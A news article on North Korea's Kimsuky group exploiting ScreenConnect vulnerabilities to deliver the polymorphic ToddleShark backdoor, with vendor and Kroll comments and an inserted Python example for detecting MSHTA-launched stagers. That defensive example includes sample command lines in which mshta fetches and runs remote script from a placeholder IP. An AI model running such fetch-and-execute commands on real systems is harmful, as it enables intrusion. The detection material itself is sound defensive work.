North Korea Hits ScreenConnect Bugs to Drop 'ToddleShark' Malware

North Korea's latest espionage tool is tough to pin down, with random generators that throw detection mechanisms off its scent. The DPRK is using the recent critical bugs in ConnectWise ScreenConnect, a remote desktop tool, to deliver the malware.
March 5, 2024
North Korean hackers are using a critical vulnerability in ConnectWise's ScreenConnect software to spread new, shapeshifting espionage malware.
Two weeks ago, ConnectWise revealed two flaws in its popular remote desktop application: CVE-2024-1708, a path traversal bug given a "high" score of 8.4 out of 10 on the CVSS scale, and CVE-2024-1709, a rare "critical" 10 out of 10 authentication bypass bug. With hardly a moment to spare, cyberattackers pounced — most notably, initial access brokers (IABs) in cahoots with ransomware groups — with thousands of organizations in the firing line scrambling to patch.
Kimsuky (aka APT43), the advanced persistent threat (APT) from the Democratic People's Republic of Korea (DPRK), is getting in on the action, too. According to a new blog post from Kroll, it's exploiting vulnerable versions of ScreenConnect to deploy a new backdoor called "ToddleShark."
"The list of threat actors utilizing the ScreenConnect vulnerability CVE-2024-1709 for initial access is growing," according to Kroll. "Patching ScreenConnect applications is therefore imperative."
ToddleShark builds on previous Kimsuky malware but stands out for its approach to anti-detection.
In recent espionage campaigns, Kimsuky has deployed various custom backdoors, including ReconShark and BabyShark, against government organizations, research centers, think tanks, and universities in North America, Europe, and Asia.
ToddleShark, the weapon of choice this time around, is notably similar to BabyShark, but it has certain important advancements.
Among other functions, ToddleShark gathers system information, including configuration details, what security software is installed on the device, and lists of user sessions, network connections, running processes, and more.
It then sends that information back to attacker-controlled command-and-control (C2) servers via cryptographically protected Privacy-Enhanced Mail (PEM) certificates.
"The malware being deployed in this case uses execution through a legitimate Microsoft binary, MSHTA, and exhibits elements of polymorphic behavior in the form of changing identity strings in code, changing the position of code via generated junk code and using uniquely generated C2 URLs, which could make this malware hard to detect in some environments," Kroll researchers said in their post, released today.
ToddleShark stands out most, though, for how it uses random generation algorithms to dodge detection. For example, it uses random names for variables and functions to stump static detection, and randomizes its strings and the ordering of code to confuse standard signature-based detection.
Interspersed with its regular malicious code are large chunks of junk code and hexadecimal-encoded code, making the final result look like a mess.
Blocklisting doesn't really work against ToddleShark, either, because the hash of the initial payload and URLs used to download additional stages of the malware are always different.
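The two points above (execution through the legitimate MSHTA binary, and payload hashes and download URLs that differ on every run) suggest where detection effort pays off. The following Python is an added illustration, not code from Kroll, ConnectWise, or the article: it runs a hash blocklist and a behavioural rule side by side over constructed process-creation events. The event fields, file paths, IP addresses, and the two payload variants are all made up for the example, and the assumption that a ScreenConnect client process spawning mshta.exe is anomalous is the example's own, not a claim from the article.

```python
"""Hash blocklist versus behavioural rule for MSHTA-launched stagers.

Added example, not code from the article, Kroll, or ConnectWise.
All events, paths, addresses and payload bodies below are constructed.
"""
from __future__ import annotations

import hashlib
import re
from dataclasses import dataclass

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)


@dataclass
class ProcEvent:
    parent_image: str   # full path of the parent process
    image: str          # full path of the created process
    cmdline: str        # command line as logged by the endpoint sensor
    payload: bytes      # bytes of the fetched script, as captured by a proxy/EDR (constructed)


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def hash_blocklist_hit(event: ProcEvent, blocklist: set[str]) -> bool:
    """Classic IoC matching: fires only when the payload hash is already known."""
    return sha256_hex(event.payload) in blocklist


def mshta_remote_launch(event: ProcEvent) -> list[str]:
    """Behavioural rule: mshta.exe executing content fetched from a URL.

    Returns the reasons that fired; an empty list means no alert.
    """
    reasons: list[str] = []
    image = event.image.rsplit("\\", 1)[-1].lower()
    if image != "mshta.exe":
        return reasons
    if URL_RE.search(event.cmdline):
        reasons.append("mshta given a remote URL on the command line")
    parent = event.parent_image.rsplit("\\", 1)[-1].lower()
    # Assumption for this example: a remote-support client spawning mshta is anomalous.
    if parent.startswith("screenconnect"):
        reasons.append("mshta spawned by a ScreenConnect process")
    return reasons


def triage(events: list[ProcEvent], blocklist: set[str]) -> list[dict]:
    """For each event, report which of the two approaches flagged it."""
    return [
        {
            "cmdline": e.cmdline,
            "hash_hit": hash_blocklist_hit(e, blocklist),
            "behaviour": mshta_remote_launch(e),
        }
        for e in events
    ]


# Two constructed payload variants: identical logic, renamed identifiers and junk comments,
# standing in for the per-run variation the article describes.
PAYLOAD_A = b'<script>var qzd8 = "stage2";/*junk*/ eval(qzd8);</script>'
PAYLOAD_B = b'<script>var Hj2Kw = "stage2";/*zzzz*/ eval(Hj2Kw);</script>'

SC_CLIENT = r"C:\Program Files (x86)\ScreenConnect Client (example)\ScreenConnect.WindowsClient.exe"
MSHTA = r"C:\Windows\System32\mshta.exe"

# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    ProcEvent(SC_CLIENT, MSHTA, "mshta.exe http://203.0.113.10/k9x2/init.hta", PAYLOAD_A),
    ProcEvent(SC_CLIENT, MSHTA, "mshta.exe https://203.0.113.10/p4qz/start.hta", PAYLOAD_B),
    ProcEvent(r"C:\Windows\explorer.exe", MSHTA,
              r'mshta.exe "C:\Program Files\Vendor\setup.hta"',
              b"<script>/* local installer */</script>"),
]

# Blocklist seeded with only the first variant's hash, as a feed would be after one sighting.
BLOCKLIST = {sha256_hex(PAYLOAD_A)}

if __name__ == "__main__":
    for row in triage(SAMPLE_EVENTS, BLOCKLIST):
        print(row)
```

Run stand-alone, the first event is caught by both methods, the second (same behaviour, different hash and URL) only by the behavioural rule, and the locally launched installer by neither. In a real deployment the parent-process condition needs tuning to the environment, but the command-line condition alone already covers the case the article describes regardless of how the payload or its URL is varied.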
The fact that detecting this backdoor is so tricky only emphasizes the need for organizations to update, if they haven't already. A patch and other resources for ConnectWise customers are available on the vendor's website.

A ConnectWise spokesperson laid out the timeline:

"On February 13th, an independent researcher submitted a potential ScreenConnect vulnerability through our voluntary disclosure process," the person says. "Once validated, ConnectWise mitigated all cloud instances of ScreenConnect within 48 hours. On February 19th, we released a patch for all on-prem ScreenConnect customers, posted a security bulletin on the ConnectWise Trust Center, and sent patching instructions to ScreenConnect customers."
ConnectWise noted that customers should immediately patch on-prem instances of ScreenConnect.
"At this time, ConnectWise and other cybersecurity firms have seen exploits of the ScreenConnect vulnerability on unpatched on-prem instances," the spokesperson says. "However, cyberattacks can occur through numerous avenues, including vulnerabilities, phishing, and business email compromise. While usually used for IT service delivery and product support, attackers can misuse remote control tools to facilitate malicious activities."

Nate Nelson, Contributing Writer

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" — an award-winning Top 20 tech podcast on Apple and Spotify — and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.